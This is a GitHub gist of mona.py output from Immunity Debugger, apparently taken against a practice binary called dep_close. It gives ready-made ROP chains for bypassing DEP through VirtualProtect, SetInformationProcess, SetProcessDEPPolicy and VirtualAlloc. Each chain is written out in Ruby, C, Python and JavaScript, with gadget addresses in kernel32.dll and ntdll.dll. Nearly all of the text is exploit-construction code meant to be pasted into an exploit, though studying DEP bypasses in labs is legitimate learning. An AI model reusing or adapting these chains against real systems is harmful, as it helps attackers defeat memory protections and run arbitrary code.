Skip to content

Instantly share code, notes, and snippets.

@xinali

xinali/rop_chains.txt

Created November 28, 2018 13:44
Show Gist options
  • Save xinali/a0cb056b1f50fdf81f24d10c754e34b1 to your computer and use it in GitHub Desktop.
Save xinali/a0cb056b1f50fdf81f24d10c754e34b1 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
rop_chains.txt
================================================================================
Output generated by mona.py v2.0, rev 576 - Immunity Debugger
Corelan Team - https://www.corelan.be
================================================================================
OS : post2008server, release 6.2.9200
Process being debugged : dep_close (pid 3416)
Current mona arguments: rop -m kernel32.dll,ntdll.dll
================================================================================
2017-11-06 15:40:06
================================================================================
-----------------------------------------------------------------------------------------------------------------------------------------
Module info :
-----------------------------------------------------------------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
-----------------------------------------------------------------------------------------------------------------------------------------
0x754c0000 | 0x75597000 | 0x000d7000 | True | True | True | False | True | 6.3.9600.18217 [KERNELBASE.dll] (C:\Windows\SYSTEM32\KERNELBASE.dll)
0x74da0000 | 0x74e40000 | 0x000a0000 | True | True | True | False | True | 6.3.9600.16384 [apphelp.dll] (C:\Windows\system32\apphelp.dll)
0x75340000 | 0x75480000 | 0x00140000 | True | True | True | False | True | 6.3.9600.18217 [KERNEL32.DLL] (C:\Windows\SYSTEM32\KERNEL32.DLL)
0x000f0000 | 0x000f6000 | 0x00006000 | True | True | False | False | False | -1.0- [dep_close.exe] (E:\pwn2exploit\dep_close\Release\dep_close.exe)
0x77a60000 | 0x77bcf000 | 0x0016f000 | True | True | True | False | True | 6.3.9600.18217 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
0x715c0000 | 0x7167f000 | 0x000bf000 | True | True | False | False | True | 10.00.40219.325 [MSVCR100.dll] (C:\Windows\SYSTEM32\MSVCR100.dll)
-----------------------------------------------------------------------------------------------------------------------------------------
################################################################################
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x753afcd8, # POP EAX # RETN [KERNEL32.DLL]
0x753c0718, # ptr to &VirtualProtect() [IAT KERNEL32.DLL]
0x7539e737, # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
0x75383d46, # XCHG EAX,ESI # RETN [KERNEL32.DLL]
0x75395d0e, # POP EBP # RETN [KERNEL32.DLL]
0x75356dc7, # & call esp [KERNEL32.DLL]
0x77abad7c, # POP EBX # RETN [ntdll.dll]
0x00000201, # 0x00000201-> ebx
0x77aa0b00, # POP EDX # RETN [ntdll.dll]
0x00000040, # 0x00000040-> edx
0x77b5b611, # POP ECX # RETN [ntdll.dll]
0x754403ed, # &Writable location [KERNEL32.DLL]
0x77a8869d, # POP EDI # RETN [ntdll.dll]
0x77b40883, # RETN (ROP NOP) [ntdll.dll]
0x7536af02, # POP EAX # RETN [KERNEL32.DLL]
0x90909090, # nop
0x77aefb99, # PUSHAD # RETN [ntdll.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
rop_chain = create_rop_chain()
*** [ C ] ***
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
int create_rop_chain(unsigned int *buf, unsigned int )
{
// rop chain generated with mona.py - www.corelan.be
unsigned int rop_gadgets[] = {
0x753afcd8, // POP EAX // RETN [KERNEL32.DLL]
0x753c0718, // ptr to &VirtualProtect() [IAT KERNEL32.DLL]
0x7539e737, // MOV EAX,DWORD PTR DS:[EAX] // RETN [KERNEL32.DLL]
0x75383d46, // XCHG EAX,ESI // RETN [KERNEL32.DLL]
0x75395d0e, // POP EBP // RETN [KERNEL32.DLL]
0x75356dc7, // & call esp [KERNEL32.DLL]
0x77abad7c, // POP EBX // RETN [ntdll.dll]
0x00000201, // 0x00000201-> ebx
0x77aa0b00, // POP EDX // RETN [ntdll.dll]
0x00000040, // 0x00000040-> edx
0x77b5b611, // POP ECX // RETN [ntdll.dll]
0x754403ed, // &Writable location [KERNEL32.DLL]
0x77a8869d, // POP EDI // RETN [ntdll.dll]
0x77b40883, // RETN (ROP NOP) [ntdll.dll]
0x7536af02, // POP EAX // RETN [KERNEL32.DLL]
0x90909090, // nop
0x77aefb99, // PUSHAD // RETN [ntdll.dll]
};
if(buf != NULL) {
memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
};
return sizeof(rop_gadgets);
}
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x753afcd8, # POP EAX # RETN [KERNEL32.DLL]
0x753c0718, # ptr to &VirtualProtect() [IAT KERNEL32.DLL]
0x7539e737, # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
0x75383d46, # XCHG EAX,ESI # RETN [KERNEL32.DLL]
0x75395d0e, # POP EBP # RETN [KERNEL32.DLL]
0x75356dc7, # & call esp [KERNEL32.DLL]
0x77abad7c, # POP EBX # RETN [ntdll.dll]
0x00000201, # 0x00000201-> ebx
0x77aa0b00, # POP EDX # RETN [ntdll.dll]
0x00000040, # 0x00000040-> edx
0x77b5b611, # POP ECX # RETN [ntdll.dll]
0x754403ed, # &Writable location [KERNEL32.DLL]
0x77a8869d, # POP EDI # RETN [ntdll.dll]
0x77b40883, # RETN (ROP NOP) [ntdll.dll]
0x7536af02, # POP EAX # RETN [KERNEL32.DLL]
0x90909090, # nop
0x77aefb99, # PUSHAD # RETN [ntdll.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%ufcd8%u753a" + // 0x753afcd8 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u0718%u753c" + // 0x753c0718 : ,# ptr to &VirtualProtect() [IAT KERNEL32.DLL]
"%ue737%u7539" + // 0x7539e737 : ,# MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
"%u3d46%u7538" + // 0x75383d46 : ,# XCHG EAX,ESI # RETN [KERNEL32.DLL]
"%u5d0e%u7539" + // 0x75395d0e : ,# POP EBP # RETN [KERNEL32.DLL]
"%u6dc7%u7535" + // 0x75356dc7 : ,# & call esp [KERNEL32.DLL]
"%uad7c%u77ab" + // 0x77abad7c : ,# POP EBX # RETN [ntdll.dll]
"%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
"%u0b00%u77aa" + // 0x77aa0b00 : ,# POP EDX # RETN [ntdll.dll]
"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
"%ub611%u77b5" + // 0x77b5b611 : ,# POP ECX # RETN [ntdll.dll]
"%u03ed%u7544" + // 0x754403ed : ,# &Writable location [KERNEL32.DLL]
"%u869d%u77a8" + // 0x77a8869d : ,# POP EDI # RETN [ntdll.dll]
"%u0883%u77b4" + // 0x77b40883 : ,# RETN (ROP NOP) [ntdll.dll]
"%uaf02%u7536" + // 0x7536af02 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u9090%u9090" + // 0x90909090 : ,# nop
"%ufb99%u77ae" + // 0x77aefb99 : ,# PUSHAD # RETN [ntdll.dll]
""); // :
--------------------------------------------------------------------------------------------------
################################################################################
Register setup for SetInformationProcess() :
--------------------------------------------
EAX = SizeOf(ExecuteFlags) (0x4)
ECX = &ExecuteFlags (ptr to 0x00000002)
EDX = ProcessExecuteFlags (0x22)
EBX = NtCurrentProcess (0xffffffff)
ESP = ReturnTo (automatic)
EBP = ptr to NtSetInformationProcess()
ESI = <not used>
EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------
ROP Chain for SetInformationProcess() [(XP/2003 Server only)] :
---------------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x75369e72, # POP EAX # RETN [KERNEL32.DLL]
0x753c0fb8, # ptr to &SetInformationProcess() [IAT KERNEL32.DLL]
0x77af1ac0, # MOV EBP,DWORD PTR DS:[EAX] # RETN [ntdll.dll]
0x77aec770, # POP EDX # RETN [ntdll.dll]
0x00000022, # 0x00000022-> edx
0x753b41e2, # POP ECX # RETN [KERNEL32.DLL]
0x753c383c, # &0x00000002 [KERNEL32.DLL]
0x77aa0c6e, # POP EBX # RETN [ntdll.dll]
0xffffffff, # 0xffffffff-> ebx
0x75368537, # POP EAX # RETN [KERNEL32.DLL]
0x00000004, # 0x00000004-> eax
0x77a886d4, # POP EDI # RETN [ntdll.dll]
0x77a886d4, # skip 4 bytes [ntdll.dll]
0x77aefb99, # PUSHAD # RETN [ntdll.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
rop_chain = create_rop_chain()
*** [ C ] ***
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
int create_rop_chain(unsigned int *buf, unsigned int )
{
// rop chain generated with mona.py - www.corelan.be
unsigned int rop_gadgets[] = {
0x75369e72, // POP EAX // RETN [KERNEL32.DLL]
0x753c0fb8, // ptr to &SetInformationProcess() [IAT KERNEL32.DLL]
0x77af1ac0, // MOV EBP,DWORD PTR DS:[EAX] // RETN [ntdll.dll]
0x77aec770, // POP EDX // RETN [ntdll.dll]
0x00000022, // 0x00000022-> edx
0x753b41e2, // POP ECX // RETN [KERNEL32.DLL]
0x753c383c, // &0x00000002 [KERNEL32.DLL]
0x77aa0c6e, // POP EBX // RETN [ntdll.dll]
0xffffffff, // 0xffffffff-> ebx
0x75368537, // POP EAX // RETN [KERNEL32.DLL]
0x00000004, // 0x00000004-> eax
0x77a886d4, // POP EDI // RETN [ntdll.dll]
0x77a886d4, // skip 4 bytes [ntdll.dll]
0x77aefb99, // PUSHAD // RETN [ntdll.dll]
};
if(buf != NULL) {
memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
};
return sizeof(rop_gadgets);
}
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x75369e72, # POP EAX # RETN [KERNEL32.DLL]
0x753c0fb8, # ptr to &SetInformationProcess() [IAT KERNEL32.DLL]
0x77af1ac0, # MOV EBP,DWORD PTR DS:[EAX] # RETN [ntdll.dll]
0x77aec770, # POP EDX # RETN [ntdll.dll]
0x00000022, # 0x00000022-> edx
0x753b41e2, # POP ECX # RETN [KERNEL32.DLL]
0x753c383c, # &0x00000002 [KERNEL32.DLL]
0x77aa0c6e, # POP EBX # RETN [ntdll.dll]
0xffffffff, # 0xffffffff-> ebx
0x75368537, # POP EAX # RETN [KERNEL32.DLL]
0x00000004, # 0x00000004-> eax
0x77a886d4, # POP EDI # RETN [ntdll.dll]
0x77a886d4, # skip 4 bytes [ntdll.dll]
0x77aefb99, # PUSHAD # RETN [ntdll.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%u9e72%u7536" + // 0x75369e72 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u0fb8%u753c" + // 0x753c0fb8 : ,# ptr to &SetInformationProcess() [IAT KERNEL32.DLL]
"%u1ac0%u77af" + // 0x77af1ac0 : ,# MOV EBP,DWORD PTR DS:[EAX] # RETN [ntdll.dll]
"%uc770%u77ae" + // 0x77aec770 : ,# POP EDX # RETN [ntdll.dll]
"%u0022%u0000" + // 0x00000022 : ,# 0x00000022-> edx
"%u41e2%u753b" + // 0x753b41e2 : ,# POP ECX # RETN [KERNEL32.DLL]
"%u383c%u753c" + // 0x753c383c : ,# &0x00000002 [KERNEL32.DLL]
"%u0c6e%u77aa" + // 0x77aa0c6e : ,# POP EBX # RETN [ntdll.dll]
"%uffff%uffff" + // 0xffffffff : ,# 0xffffffff-> ebx
"%u8537%u7536" + // 0x75368537 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u0004%u0000" + // 0x00000004 : ,# 0x00000004-> eax
"%u86d4%u77a8" + // 0x77a886d4 : ,# POP EDI # RETN [ntdll.dll]
"%u86d4%u77a8" + // 0x77a886d4 : ,# skip 4 bytes [ntdll.dll]
"%ufb99%u77ae" + // 0x77aefb99 : ,# PUSHAD # RETN [ntdll.dll]
""); // :
--------------------------------------------------------------------------------------------------
################################################################################
Register setup for SetProcessDEPPolicy() :
--------------------------------------------
EAX = <not used>
ECX = <not used>
EDX = <not used>
EBX = dwFlags (ptr to 0x00000000)
ESP = ReturnTo (automatic)
EBP = ptr to SetProcessDEPPolicy()
ESI = <not used>
EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------
ROP Chain for SetProcessDEPPolicy() [(XP SP3/Vista SP1/2008 Server SP1, can be called only once per process)] :
---------------------------------------------------------------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x77a6b8d7, # POP EBP # RETN [ntdll.dll]
0x75365620, # SetProcessDEPPolicy() [KERNEL32.DLL]
0x7539df4a, # POP EBX # RETN [KERNEL32.DLL]
0x75340011, # &0x00000000 [KERNEL32.DLL]
0x77a885c4, # POP EDI # RETN [ntdll.dll]
0x77a885c4, # skip 4 bytes [ntdll.dll]
0x77a8cd5c, # PUSHAD # RETN [ntdll.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
rop_chain = create_rop_chain()
*** [ C ] ***
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
int create_rop_chain(unsigned int *buf, unsigned int )
{
// rop chain generated with mona.py - www.corelan.be
unsigned int rop_gadgets[] = {
0x77a6b8d7, // POP EBP // RETN [ntdll.dll]
0x75365620, // SetProcessDEPPolicy() [KERNEL32.DLL]
0x7539df4a, // POP EBX // RETN [KERNEL32.DLL]
0x75340011, // &0x00000000 [KERNEL32.DLL]
0x77a885c4, // POP EDI // RETN [ntdll.dll]
0x77a885c4, // skip 4 bytes [ntdll.dll]
0x77a8cd5c, // PUSHAD // RETN [ntdll.dll]
};
if(buf != NULL) {
memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
};
return sizeof(rop_gadgets);
}
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x77a6b8d7, # POP EBP # RETN [ntdll.dll]
0x75365620, # SetProcessDEPPolicy() [KERNEL32.DLL]
0x7539df4a, # POP EBX # RETN [KERNEL32.DLL]
0x75340011, # &0x00000000 [KERNEL32.DLL]
0x77a885c4, # POP EDI # RETN [ntdll.dll]
0x77a885c4, # skip 4 bytes [ntdll.dll]
0x77a8cd5c, # PUSHAD # RETN [ntdll.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%ub8d7%u77a6" + // 0x77a6b8d7 : ,# POP EBP # RETN [ntdll.dll]
"%u5620%u7536" + // 0x75365620 : ,# SetProcessDEPPolicy() [KERNEL32.DLL]
"%udf4a%u7539" + // 0x7539df4a : ,# POP EBX # RETN [KERNEL32.DLL]
"%u0011%u7534" + // 0x75340011 : ,# &0x00000000 [KERNEL32.DLL]
"%u85c4%u77a8" + // 0x77a885c4 : ,# POP EDI # RETN [ntdll.dll]
"%u85c4%u77a8" + // 0x77a885c4 : ,# skip 4 bytes [ntdll.dll]
"%ucd5c%u77a8" + // 0x77a8cd5c : ,# PUSHAD # RETN [ntdll.dll]
""); // :
--------------------------------------------------------------------------------------------------
################################################################################
Register setup for VirtualAlloc() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
--------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x753b71d2, # POP EAX # RETN [KERNEL32.DLL]
0x753c06fc, # ptr to &VirtualAlloc() [IAT KERNEL32.DLL]
0x7539e737, # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
0x75383d46, # XCHG EAX,ESI # RETN [KERNEL32.DLL]
0x753afa0b, # POP EBP # RETN [KERNEL32.DLL]
0x75356dc7, # & call esp [KERNEL32.DLL]
0x77ab89a9, # POP EBX # RETN [ntdll.dll]
0x00000001, # 0x00000001-> ebx
0x77a87065, # POP EDX # RETN [ntdll.dll]
0x00001000, # 0x00001000-> edx
0x77ab4a71, # POP ECX # RETN [ntdll.dll]
0x00000040, # 0x00000040-> ecx
0x77a8835c, # POP EDI # RETN [ntdll.dll]
0x77b40883, # RETN (ROP NOP) [ntdll.dll]
0x75369e72, # POP EAX # RETN [KERNEL32.DLL]
0x90909090, # nop
0x77a8cd5c, # PUSHAD # RETN [ntdll.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
rop_chain = create_rop_chain()
*** [ C ] ***
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
int create_rop_chain(unsigned int *buf, unsigned int )
{
// rop chain generated with mona.py - www.corelan.be
unsigned int rop_gadgets[] = {
0x753b71d2, // POP EAX // RETN [KERNEL32.DLL]
0x753c06fc, // ptr to &VirtualAlloc() [IAT KERNEL32.DLL]
0x7539e737, // MOV EAX,DWORD PTR DS:[EAX] // RETN [KERNEL32.DLL]
0x75383d46, // XCHG EAX,ESI // RETN [KERNEL32.DLL]
0x753afa0b, // POP EBP // RETN [KERNEL32.DLL]
0x75356dc7, // & call esp [KERNEL32.DLL]
0x77ab89a9, // POP EBX // RETN [ntdll.dll]
0x00000001, // 0x00000001-> ebx
0x77a87065, // POP EDX // RETN [ntdll.dll]
0x00001000, // 0x00001000-> edx
0x77ab4a71, // POP ECX // RETN [ntdll.dll]
0x00000040, // 0x00000040-> ecx
0x77a8835c, // POP EDI // RETN [ntdll.dll]
0x77b40883, // RETN (ROP NOP) [ntdll.dll]
0x75369e72, // POP EAX // RETN [KERNEL32.DLL]
0x90909090, // nop
0x77a8cd5c, // PUSHAD // RETN [ntdll.dll]
};
if(buf != NULL) {
memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
};
return sizeof(rop_gadgets);
}
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x753b71d2, # POP EAX # RETN [KERNEL32.DLL]
0x753c06fc, # ptr to &VirtualAlloc() [IAT KERNEL32.DLL]
0x7539e737, # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
0x75383d46, # XCHG EAX,ESI # RETN [KERNEL32.DLL]
0x753afa0b, # POP EBP # RETN [KERNEL32.DLL]
0x75356dc7, # & call esp [KERNEL32.DLL]
0x77ab89a9, # POP EBX # RETN [ntdll.dll]
0x00000001, # 0x00000001-> ebx
0x77a87065, # POP EDX # RETN [ntdll.dll]
0x00001000, # 0x00001000-> edx
0x77ab4a71, # POP ECX # RETN [ntdll.dll]
0x00000040, # 0x00000040-> ecx
0x77a8835c, # POP EDI # RETN [ntdll.dll]
0x77b40883, # RETN (ROP NOP) [ntdll.dll]
0x75369e72, # POP EAX # RETN [KERNEL32.DLL]
0x90909090, # nop
0x77a8cd5c, # PUSHAD # RETN [ntdll.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%u71d2%u753b" + // 0x753b71d2 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u06fc%u753c" + // 0x753c06fc : ,# ptr to &VirtualAlloc() [IAT KERNEL32.DLL]
"%ue737%u7539" + // 0x7539e737 : ,# MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
"%u3d46%u7538" + // 0x75383d46 : ,# XCHG EAX,ESI # RETN [KERNEL32.DLL]
"%ufa0b%u753a" + // 0x753afa0b : ,# POP EBP # RETN [KERNEL32.DLL]
"%u6dc7%u7535" + // 0x75356dc7 : ,# & call esp [KERNEL32.DLL]
"%u89a9%u77ab" + // 0x77ab89a9 : ,# POP EBX # RETN [ntdll.dll]
"%u0001%u0000" + // 0x00000001 : ,# 0x00000001-> ebx
"%u7065%u77a8" + // 0x77a87065 : ,# POP EDX # RETN [ntdll.dll]
"%u1000%u0000" + // 0x00001000 : ,# 0x00001000-> edx
"%u4a71%u77ab" + // 0x77ab4a71 : ,# POP ECX # RETN [ntdll.dll]
"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> ecx
"%u835c%u77a8" + // 0x77a8835c : ,# POP EDI # RETN [ntdll.dll]
"%u0883%u77b4" + // 0x77b40883 : ,# RETN (ROP NOP) [ntdll.dll]
"%u9e72%u7536" + // 0x75369e72 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u9090%u9090" + // 0x90909090 : ,# nop
"%ucd5c%u77a8" + // 0x77a8cd5c : ,# PUSHAD # RETN [ntdll.dll]
""); // :
--------------------------------------------------------------------------------------------------
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment